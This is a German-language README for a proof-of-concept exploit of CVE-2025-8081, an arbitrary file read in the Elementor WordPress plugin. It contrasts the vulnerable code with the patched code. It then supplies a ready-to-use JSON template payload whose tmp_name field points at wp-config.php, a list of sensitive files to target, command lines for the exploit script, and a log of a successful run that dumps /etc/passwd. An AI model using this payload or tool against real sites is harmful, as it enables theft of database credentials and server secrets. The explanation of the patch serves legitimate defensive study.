
Proof-of-Concept-Exploit für CVE-2025-8081, ein beliebiges Dateilesen im Elementor-WordPress-Plugin, das authentifizierten Administratoren das Lesen sensibler Dateien wie wp-config.php ermöglicht.
Eine kritische Schwachstelle für beliebiges Dateilesen im Elementor-WordPress-Plugin, die es authentifizierten Administratoren ermöglicht, jede Datei zu lesen, auf die der Webserver zugreifen kann, einschließlich sensibler Konfigurationsdateien mit Datenbank-Anmeldedaten.
| Eigenschaft | Wert |
|---|---|
| CVE-ID | CVE-2025-8081 |
| Typ | Beliebiges Dateilesen (CWE-22: Path Traversal) |
| CVSS-Score | 4.9 (Mittel) – Tatsächliche Auswirkung: KRITISCH |
| CVSS-Vektor | AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N |
| Betroffene Versionen | Elementor ≤ 3.30.2 |
| Behobene Version | Elementor ≥ 3.30.3 |
| Veröffentlichungsdatum | 22. Juli 2025 |
| Offenlegungsdatum | 15. Oktober 2025 |
wp-config.php offenbart Datenbank-Anmeldedaten und SicherheitsschlüsselDie Schwachstelle existiert in einer einzelnen Datei an einer einzelnen Zeile:
elementor/includes/template-library/classes/class-import-images.php
Zeile 115 (v3.28.3)
if ( isset( $attachment['tmp_name'] ) ) {
// Used when called to import a directly-uploaded file.
$filename = $attachment['name'];
$file_content = Utils::file_get_contents( $attachment['tmp_name'] ); // ❌ NO VALIDATION!
}
Problem: Der Parameter tmp_name wird NICHT mit is_uploaded_file() validiert, sodass ein Angreifer beliebige Dateipfade angeben kann.
if ( isset( $attachment['tmp_name'] ) ) {
// Used when called to import a directly-uploaded file.
$filename = $attachment['name'];
$file_content = false;
// security validation in case the tmp_name has been tampered with
if ( is_uploaded_file( $attachment['tmp_name'] ) ) { // ✅ VALIDATION ADDED!
$file_content = Utils::file_get_contents( $attachment['tmp_name'] );
}
}
Behebung: Der Patch fügt die is_uploaded_file()-Validierung hinzu, um sicherzustellen, dass sich tmp_name auf eine legitime, per HTTP-POST hochgeladene Datei bezieht.
{
"content": [{
"id": "s1",
"elType": "section",
"settings": [],
"elements": [{
"id": "c1",
"elType": "column",
"settings": {"_column_size": 100},
"elements": [{
"id": "w1",
"elType": "widget",
"widgetType": "image",
"settings": {
"image": {
"url": "http://x.com/x.jpg",
"id": 1,
"tmp_name": "/var/www/html/wp-config.php",
"name": "leaked_config.txt"
}
},
"elements": []
}]
}]
}],
"version": "0.4",
"type": "page"
}
payload.json speichern)leaked_config.txt finden und herunterladenErgebnis: wp-config.php-Inhalt mit Datenbank-Anmeldedaten offengelegt!
| Datei | Beschreibung | Auswirkung |
|---|---|---|
/var/www/html/wp-config.php | WordPress-Konfiguration | 🔴 KRITISCH – DB-Anmeldedaten |
/proc/self/environ | Umgebungsvariablen | 🔴 KRITISCH – API-Schlüssel, Geheimnisse |
| Datei | Beschreibung | Auswirkung |
|---|---|---|
/etc/passwd | Systembenutzer | 🟠 HOCH – Benutzeraufzählung |
/var/www/html/.htaccess | Webserver-Konfiguration | 🟠 HOCH – Offenlegung der Konfiguration |
/var/log/apache2/access.log | Apache-Protokolle | 🟡 MITTEL – Offenlegung von Informationen |
python3 exploit.py -t https://target.com -u admin -p password123
Erforderliche Argumente:
-t, --target URL Ziel-WordPress-URL (z. B. https://target.com)
-u, --user BENUTZERNAME WordPress-Admin-Benutzername
-p, --password PASSWORT WordPress-Admin-Passwort
Optionale Argumente:
-f, --file PFAD Zu lesende Datei (Standard: /var/www/html/wp-config.php)
-o, --output DATEI Ausgabedateiname (Standard: automatisch generiert)
--insecure, -k SSL-Zertifikatsprüfung deaktivieren
-v, --verbose Ausführliche Ausgabe für Debugging aktivieren
-h, --help Hilfemeldung anzeigen
# Grundlegende Ausnutzung (liest wp-config.php mit Standard-Payload)
python3 exploit.py -t http://target.com -u admin -p password123
# Benutzerdefinierte Zieldatei
python3 exploit.py -t http://target.com -u admin -p password123 -f /etc/passwd
# Mit HTTPS und selbstsigniertem Zertifikat
python3 exploit.py -t https://target.com -u admin -p password123 --insecure
# Ausführlicher Modus mit benutzerdefinierter Ausgabe
python3 exploit.py -t http://target.com -u admin -p password123 \
-f /etc/passwd -o users.txt -v
# Von OrbStack/Docker mit Ziel auf Host-Maschine
python3 exploit.py -t http://host.internal:8080 -u admin -p password123 -v
Kali:~$ python3 exploit.py -t http://host.internal:8080 -u admin -p admin123 -f /etc/passwd
======================================================================
CVE-2025-8081 - Elementor Arbitrary File Read
======================================================================
Target: http://host.internal:8080
File: /etc/passwd
======================================================================
[INFO] Attempting WordPress authentication...
[SUCCESS] ✓ Authentication successful!
[INFO] Fetching AJAX nonce...
[INFO] Loading payload: payload.json
[INFO] Uploading malicious template...
[SUCCESS] ✓ Template uploaded successfully!
[INFO] Searching for leaked file: leaked_passwd.txt
[SUCCESS] ✓ Found file: http://host.internal:8080/wp-content/uploads/2025/10/leaked_passwd.txt
[INFO] Downloading file...
[SUCCESS] ✓ Downloaded 839 bytes
======================================================================
EXPLOITATION SUCCESSFUL!
======================================================================
File URL: http://host.internal:8080/wp-content/uploads/2025/10/leaked_passwd.txt
File size: 839 bytes
Saved to: leaked_passwd.txt
--- FILE CONTENT (first 500 chars) ---
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin
--- END ---
======================================================================